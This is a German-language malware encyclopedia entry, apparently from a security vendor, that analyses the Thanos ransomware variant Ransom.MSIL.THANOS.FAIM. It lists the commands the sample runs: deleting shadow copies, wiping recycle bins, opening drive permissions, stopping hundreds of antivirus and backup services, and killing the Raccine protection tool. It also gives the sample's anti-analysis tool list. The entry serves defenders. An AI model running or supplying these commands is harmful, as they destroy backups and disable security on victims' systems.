Ransom.MSIL.THANOS.FAIM

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Wird ausgeführt und löscht sich dann selbst.

Löscht Registrierungsschlüssel von Antiviren-Programmen. Dadurch kann diese Malware ihre Routinen unentdeckt von Antiviren-Programmen ausführen.

Übertragungsdetails

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

Schleust die folgenden Dateien ein:

• %System%\UserName={Username}_MachineName={Machine Name}_{Volume Serial Number}.txt -> contains the machine's IP, the date of encryption and unique identifier key
• %User Startup%\mystartup.lnk -> points to the created ransom note

(Hinweis: %System% ist der Windows Systemordner. Er lautet in der Regel C:\Windows\System unter Windows 98 und ME, C:\WINNT\System32 unter Windows NT und 2000 sowie C:\Windows\System32 unter Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) and 10(64-bit).. %User Startup% ist der Ordner 'Autostart' des aktuellen Benutzers, normalerweise C:\Windows\Profile\{Benutzername}\Startmenü\Programme\Autostart unter Windows 98 und ME, C:\WINNT\Profile\{Benutzername}\Startmenü\Programme\Autostart unter Windows NT, C:\Documents and Settings\{Benutzername}\Startmenü\Programme\Autostart unter Windows 2003(32-bit), XP und 2000(32-bit) und C:\Users\{Benutzername}\AppData\Roaming\Microsoft\Windows\Startmenü\Programme\Autostart unter Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) und 10(64-bit).)

Fügt die folgenden Prozesse hinzu:

• "taskkill" /F /IM RaccineSettings.exe
• "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
• "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
• "reg" delete HKCU\Software\Raccine /F
• "schtasks" /DELETE /TN "Raccine Rules Updater" /F
• "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
• "cmd.exe" /c rd /s /q D:\$Recycle.bin
• "%System%\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "{Malware Path}\{Malware Filename}.exe
• "sc.exe" config Dnscache start= auto;
• "sc.exe" config FDResPub start= auto;
• "sc.exe" config SSDPSRV start= auto;
• "sc.exe" config upnphost start= auto;
• "sc.exe" config SQLTELEMETRY start= disabled;
• "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled;
• "sc.exe" config SQLWriter start= disabled;
• "sc.exe" config SstpSvc start= disabled;
• "net.exe" start Dnscache /y;
• "net.exe" start FDResPub /y;
• "net.exe" start SSDPSRV /y;
• "net.exe" start upnphost /y;
• "net.exe" stop avpsus /y;
• "net.exe" stop McAfeeDLPAgentService /y;
• "net.exe" stop mfewc /y;
• "net.exe" stop BMR Boot Service /y;
• "net.exe" stop NetBackup BMR MTFTP Service /y;
• "net.exe" stop DefWatch /y;
• "net.exe" stop ccEvtMgr /y;
• "net.exe" stop ccSetMgr /y;
• "net.exe" stop SavRoam /y;
• "net.exe" stop RTVscan /y;
• "net.exe" stop QBFCService /y;
• "net.exe" stop QBIDPService /y;
• "net.exe" stop Intuit.QuickBooks.FCS /y;
• "net.exe" stop QBCFMonitorService /y;
• "net.exe" stop YooBackup /y;
• "net.exe" stop YooIT /y;
• "net.exe" stop zhudongfangyu /y;
• "net.exe" stop stc_raw_agent /y;
• "net.exe" stop VSNAPVSS /y;
• "net.exe" stop VeeamTransportSvc /y;
• "net.exe" stop VeeamDeploymentService /y;
• "net.exe" stop VeeamNFSSvc /y;
• "net.exe" stop veeam /y;
• "net.exe" stop PDVFSService /y;
• "net.exe" stop BackupExecVSSProvider /y;
• "net.exe" stop BackupExecAgentAccelerator /y;
• "net.exe" stop BackupExecAgentBrowser /y;
• "net.exe" stop bedbg /y;
• "net.exe" stop MSSQL$SQL_2008 /y;
• "net.exe" stop EhttpSrv /y;
• "net.exe" stop MMS /y;
• "net.exe" stop MSSQL$SQLEXPRESS /y;
• "net.exe" stop ekrn /y;
• "net.exe" stop mozyprobackup /y;
• "net.exe" stop BackupExecDiveciMediaService /y;
• "net.exe" stop “SQL Backups /y;
• "net.exe" stop MSSQL$SYSTEM_BGC /y;
• "net.exe" stop EPSecurityService /y;
• "net.exe" stop MSSQL$VEEAMSQL2008R2 /y;
• "net.exe" stop MSSQL$TPS /y;
• "net.exe" stop EPUpdateService /y;
• "net.exe" stop ntrtscan /y;
• "net.exe" stop MSSQL$TPSAMA /y;
• "net.exe" stop EsgShKernel /y;
• "net.exe" stop PDVFSService /y;
• "net.exe" stop MSSQL$VEEAMSQL2008R2 /y;
• "net.exe" stop ESHASRV /y;
• "net.exe" stop SDRSVC /y;
• "net.exe" stop MSSQL$VEEAMSQL2012 /y;
• "net.exe" stop FA_Scheduler /y;
• "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y;
• "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y;
• "net.exe" stop KAVFS /y;
• "net.exe" stop BackupExecJobEngine /y;
• "net.exe" stop MsDtsServer100 /y;
• "net.exe" stop NetMsmqActivator /y;
• "net.exe" stop MSExchangeIS /y;
• "net.exe" stop “Sophos AutoUpdate Service” /y;
• "net.exe" stop SamSs /y;
• "net.exe" stop ReportServer /y;
• "net.exe" stop “SQLsafe Backup Service” /y;
• "net.exe" stop MsDtsServer110 /y;
• "net.exe" stop POP3Svc /y;
• "net.exe" stop MSExchangeMGMT /y;
• "net.exe" stop “Sophos Clean Service” /y;
• "net.exe" stop SMTPSvc /y;
• "net.exe" stop ReportServer$SQL_2008 /y;
• "net.exe" stop “SQLsafe Filter Service” /y;
• "net.exe" stop SQLWriter /y;
• "net.exe" stop BackupExecManagementService /y;
• "net.exe" stop BackupExecRPCService /y;
• "net.exe" stop AcrSch2Svc /y;
• "net.exe" stop AcronisAgent /y;
• "net.exe" stop msftesql$PROD /y;
• "net.exe" stop SstpSvc /y;
• "net.exe" stop MSExchangeMTA /y;
• "net.exe" stop “Sophos Device Control Service” /y;
• "net.exe" stop ReportServer$SYSTEM_BGC /y;
• "net.exe" stop “Symantec System Recovery” /y;
• "net.exe" stop MSOLAP$SQL_2008 /y;
• "net.exe" stop UI0Detect /y;
• "net.exe" stop MSExchangeSA /y;
• "net.exe" stop “Sophos File Scanner Service” /y;
• "net.exe" stop ReportServer$TPS /y;
• "net.exe" stop “Veeam Backup Catalog Data Service” /y;
• "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y;
• "net.exe" stop CASAD2DWebSvc /y;
• "net.exe" stop MSOLAP$SYSTEM_BGC /y;
• "net.exe" stop KAVFSGT /y;
• "net.exe" stop CAARCUpdateSvc /y;
• "net.exe" stop W3Svc /y;
• "net.exe" stop VeeamBackupSvc /y;
• "net.exe" stop sophos /y;
• "net.exe" stop MSExchangeSRS /y;
• "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y;
• "net.exe" stop kavfsslp /y;
• "net.exe" stop VeeamBrokerSvc /y;
• "net.exe" stop MSSQLFDLauncher$SQL_2008 /y;
• "net.exe" stop klnagent /y;
• "net.exe" stop VeeamCatalogSvc /y;
• "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y;
• "net.exe" stop macmnsvc /y;
• "net.exe" stop VeeamCloudSvc /y;
• "net.exe" stop MSSQLFDLauncher$TPS /y;
• "net.exe" stop masvc /y;
• "net.exe" stop VeeamDeploymentService /y;
• "net.exe" stop MSSQLFDLauncher$TPSAMA /y;
• "net.exe" stop MBAMService /y;
• "net.exe" stop VeeamDeploySvc /y;
• "net.exe" stop MSSQLSERVER /y;
• "net.exe" stop MBEndpointAgent /y;
• "net.exe" stop VeeamEnterpriseManagerSvc /y;
• "net.exe" stop MSSQLServerADHelper /y;
• "net.exe" stop McAfeeEngineService /y;
• "net.exe" stop VeeamHvIntegrationSvc /y;
• "net.exe" stop MSSQLServerADHelper100 /y;
• "net.exe" stop McAfeeFramework /y;
• "net.exe" stop VeeamMountSvc /y;
• "net.exe" stop MSSQLServerOLAPService /y;
• "net.exe" stop McAfeeFrameworkMcAfeeFramework /y;
• "net.exe" stop VeeamNFSSvc /y;
• "net.exe" stop MySQL57 /y;
• "net.exe" stop McShield /y;
• "net.exe" stop VeeamRESTSvc /y;
• "net.exe" stop MySQL80 /y;
• "net.exe" stop McTaskManager /y;
• "net.exe" stop “Acronis VSS Provider” /y;
• "net.exe" stop “Sophos Health Service” /y;
• "net.exe" stop VeeamTransportSvc /y;
• "net.exe" stop MsDtsServer /y;
• "net.exe" stop ReportServer$TPSAMA /y;
• "net.exe" stop OracleClientCache80 /y;
• "net.exe" stop IISAdmin /y;
• "net.exe" stop “Zoolz 2 Service” /y;
• "net.exe" stop mfefire /y;
• "net.exe" stop MSExchangeES /y;
• "net.exe" stop MSOLAP$TPS /y;
• "net.exe" stop wbengine /y;
• "net.exe" stop “Sophos Agent” /y;
• "net.exe" stop “aphidmonitorservice” /y;
• "net.exe" stop ReportServer$SQL_2008 /y;
• ;"net.exe" stop EraserSvc11710 /y;
• "net.exe" stop msexchangeadtopology /y;
• "net.exe" stop mfemms /y;
• "net.exe" stop “Enterprise Client Service” /y;
• "net.exe" stop “Sophos MCS Agent” /y;
• "net.exe" stop wbengine /y;
• "net.exe" stop SepMasterService /y;
• "net.exe" stop MSSQL$ECWDB2 /y;
• "net.exe" stop AcrSch2Svc /y;
• "net.exe" stop MSOLAP$TPSAMA /y;
• "net.exe" stop RESvc /y;
• "net.exe" stop SQLAgent$PRACTTICEMGT /y;
• "net.exe" stop audioendpointbuilder /y;
• "net.exe" stop “intel(r) proset monitoring service” /y;
• "net.exe" stop mfevtp /y;
• "net.exe" stop sms_site_sql_backup /y;
• "net.exe" stop SQLAgent$BKUPEXEC /y;
• "net.exe" stop MSSQL$SOPHOS /y;
• "net.exe" stop SQLAgent$CITRIX_METAFRAME /y;
• "net.exe" stop sacsvr /y;
• "net.exe" stop SQLAgent$CXDB /y;
• "net.exe" stop SAVAdminService /y;
• "net.exe" stop SQLAgent$ECWDB2 /y;
• "net.exe" stop SAVService /y;
• "net.exe" stop SQLAgent$PRACTTICEBGC /y;
• "net.exe" stop SQLAgent$PROD /y;
• "net.exe" stop Smcinst /y;
• "net.exe" stop SQLAgent$PROFXENGAGEMENT /y;
• "net.exe" stop SmcService /y;
• "net.exe" stop SQLAgent$SBSMONITORING /y;
• "net.exe" stop SntpService /y;
• "net.exe" stop ShMonitor /y;
• "net.exe" stop “Sophos Safestore Service” /y;
• "net.exe" stop msexchangeimap4 /y;
• "net.exe" stop SQLAgent$SHAREPOINT /y;
• "net.exe" stop SQLAgent$TPSAMA /y;
• "net.exe" stop BackupExecAgentBrowser /y;
• "net.exe" stop “Sophos MCS Client” /y;
• "net.exe" stop sophossps /y;
• "net.exe" stop swi_update /y;
• "net.exe" stop MSSQL$PRACTICEMGT /y;
• "net.exe" stop ARSM /y;
• "net.exe" stop SQLAgent$SQL_2008 /y;
• "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y;
• "net.exe" stop “Sophos System Protection Service” /y;
• "net.exe" stop MSSQL$BKUPEXEC /y;
• "net.exe" stop SQLAgent$SOPHOS /y;
• "net.exe" stop swi_update_64 /y;
• "net.exe" stop BackupExecDeviceMediaService /y;
• "net.exe" stop unistoresvc_1af40a /y;
• "net.exe" stop SQLAgent$SQLEXPRESS /y;
• "net.exe" stop SQLAgent$VEEAMSQL2012 /y;
• "net.exe" stop MSSQL$PRACTTICEBGC /y;
• "net.exe" stop “Sophos Message Router” /y;
• "net.exe" stop BackupExecAgentAccelerator /y;
• "net.exe" stop MSSQL$SBSMONITORING /;
• "net.exe" stop MSSQL$SBSMONITORING /y;
• "net.exe" stop AVP /y;
• "net.exe" stop BackupExecVSSProvider /y;
• "net.exe" stop MSSQL$SHAREPOINT /y;
• "net.exe" stop DCAgent /y;
• "net.exe" stop SQLTELEMETRY /y;
• "net.exe" stop TrueKeyServiceHelper /y;
• "net.exe" stop svcGenericHost /y;
• "net.exe" stop TmCCSF /y;
• "net.exe" stop “Sophos Web Control Service” /y;
• "net.exe" stop SQLTELEMETRY$ECWDB2 /y;
• "net.exe" stop SQLAgent$SYSTEM_BGC /y;
• "net.exe" stop SQLBrowser /y;
• "net.exe" stop BackupExecJobEngine /y;
• "net.exe" stop MSSQL$PROD /y;
• "net.exe" stop AcronisAgent /y;
• "net.exe" stop BackupExecManagementService /y;
• "net.exe" stop MSSQL$PROFXENGAGEMENT /y;
• "net.exe" stop Antivirus /y;
• "net.exe" stop BackupExecRPCService /y;
• "net.exe" stop WRSVC /y;
• "net.exe" stop swi_filter /y;
• "net.exe" stop tmlisten /y;
• "net.exe" stop mssql$vim_sqlexp /y;
• "net.exe" stop SQLAgent$TPS /y;
• "net.exe" stop swi_service /y;
• "net.exe" stop SQLSafeOLRService /y;
• "net.exe" stop vapiendpoint /y;
• "net.exe" stop TrueKey /y;
• "net.exe" stop SQLSERVERAGENT /y;
• "net.exe" stop TrueKeyScheduler /y;
• "taskkill.exe" /IM mspub.exe /F;
• "taskkill.exe" /IM synctime.exe /F;
• "taskkill.exe" /IM mydesktopqos.exe /F;
• "taskkill.exe" /IM mydesktopservice.exe /F;
• "taskkill.exe" /IM Ntrtscan.exe /F;
• "taskkill.exe" /IM sqbcoreservice.exe /F;
• "taskkill.exe" /IM mysqld.exe /F;
• "taskkill.exe" /IM isqlplussvc.exe /F;
• "taskkill.exe" /IM firefoxconfig.exe /F;
• "taskkill.exe" /IM excel.exe /F;
• "taskkill.exe" /IM CNTAoSMgr.exe /F;
• "taskkill.exe" /IM sqlwriter.exe /F;
• "taskkill.exe" /IM tbirdconfig.exe /F;
• "taskkill.exe" /IM agntsvc.exe /F;
• "taskkill.exe" /IM onenote.exe /F;
• "taskkill.exe" /IM PccNTMon.exe /F;
• "taskkill.exe" /IM msaccess.exe /F;
• "taskkill.exe" /IM outlook.exe /F;
• "taskkill.exe" /IM tmlisten.exe /F;
• "taskkill.exe" /IM msftesql.exe /F;
• "taskkill.exe" /IM powerpnt.exe /F;
• "taskkill.exe" /IM mydesktopqos.exe /F;
• "taskkill.exe" /IM visio.exe /F;
• "taskkill.exe" /IM mydesktopservice.exe /F;
• "taskkill.exe" /IM winword.exe /F;
• "taskkill.exe" /IM mysqld-nt.exe /F;
• "taskkill.exe" /IM wordpad.exe /F;
• "taskkill.exe" /IM dbeng50.exe /F;
• "taskkill.exe" /IM thebat.exe /F;
• "taskkill.exe" /IM steam.exe /F;
• "taskkill.exe" /IM encsvc.exe /F;
• "taskkill.exe" /IM mysqld-opt.exe /F;
• "taskkill.exe" /IM thebat64.exe /F;
• "taskkill.exe" /IM xfssvccon.exe /F;
• "taskkill.exe" /IM ocautoupds.exe /F;
• "taskkill.exe" /IM ocomm.exe /F;
• "taskkill.exe" /IM ocssd.exe /F;
• "taskkill.exe" /IM infopath.exe /F;
• "taskkill.exe" /IM mbamtray.exe /F;
• "taskkill.exe" /IM zoolz.exe /F;
• "taskkill.exe" /IM oracle.exe /F;
• "taskkill.exe" IM thunderbird.exe /F;
• "taskkill.exe" /IM dbsnmp.exe /F;
• "taskkill.exe" /IM sqlagent.exe /F;
• "taskkill.exe" /IM sqlbrowser.exe /F;
• "taskkill.exe" /IM sqlservr.exe /F;
• "icacls" "C:*" /grant Everyone:F /T /C /Q
• "icacls" "D:*" /grant Everyone:F /T /C /Q
• "icacls" "Z:*" /grant Everyone:F /T /C /Q
• "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
• "cmd.exe" /c net view
• "%System%\mshta.exe" %Desktop%\RESTORE_FILES_INFO.hta

(Hinweis: %System% ist der Windows Systemordner. Er lautet in der Regel C:\Windows\System unter Windows 98 und ME, C:\WINNT\System32 unter Windows NT und 2000 sowie C:\Windows\System32 unter Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) and 10(64-bit).. %Desktop% ist der Ordner 'Desktop' für den aktuellen Benutzer, normalerweise C:\Windows\Profile\{Benutzername}\Desktop unter Windows 98 und ME, C:\WINNT\Profile\{Benutzername}\Desktop unter Windows NT, C:\Dokumente und Einstellungen\{Benutzername}\Desktop unter Windows 2000(32-bit), XP und Server 2003(32-bit) und C:\Users\{Benutzername}\Desktop unter Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) und 10(64-bit).)

Wird ausgeführt und löscht sich dann selbst.

Fügt die folgenden Mutexe hinzu, damit nur jeweils eine ihrer Kopien ausgeführt wird:

• af1565f9-32ee-4d2e-bd3d-c27df873f7e2

Beendet sich selbst, wenn die folgenden Prozesse im Speicher des betroffenen Systems gefunden werden:

• CFF Explorer
• de4dot
• dnspy
• dnspy-x86
• dotpeek
• dotpeek64
• dumpcap
• effetech http sniffer
• fiddler
• firesheep
• http analyzer stand-alone
• HTTPNetworkSniffer
• ida64
• IEWatch Professional
• ilspy
• intercepter
• Intercepter-NG
• LordPE
• MegaDumper
• NetworkMiner
• NetworkTrafficView
• NoFuserEx
• ollydbg
• PEiD
• pe-sieve
• procexp
• procexp64
• protection_id
• RDG Packer Detector
• sysinternals tcpview
• tcpdump
• UnConfuserEx
• Universal_Fixer
• wireshark
• wireshark portable
• x32dbg
• x64dbg

Andere Systemänderungen

Ändert die folgenden Registrierungseinträge:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Policies\
System
LocalAccountTokenFilterPolicy = 1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Policies\
System
EnableLinkedConnections = 1

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
Control\FileSystem
LongPathsEnabled = 1

Löscht die folgenden Registrierungsschlüssel von Antiviren- und Sicherheitsanwendungen:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\EventLog\Application
Raccine =

HKEY_LOCAL_MACHINE\SOFTWARE
Raccine =

HKEY_CURRENT_USER\SOFTWARE
Raccine =

Andere Details

Es macht Folgendes:

• This ransomware requires to be executed with admin rights to proceed with its intended routine
• It affects all existing drives of the affected machine
• It empties out the Recycle Bin
• This ransomware deletes the following subkeys from under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options:
  • vssadmin.exe
  • wmic.exe
  • wbadmin.exe
  • bcdedit.exe
  • powershell.exe
  • diskshadow.exe
  • net.exe
• Kills processes with large private memory space if their process name is not one of the following:
  • {Malware name}
  • chrome
  • opera
  • msedge
  • iexplore
  • firefox
  • explorer
  • winint
  • winlogon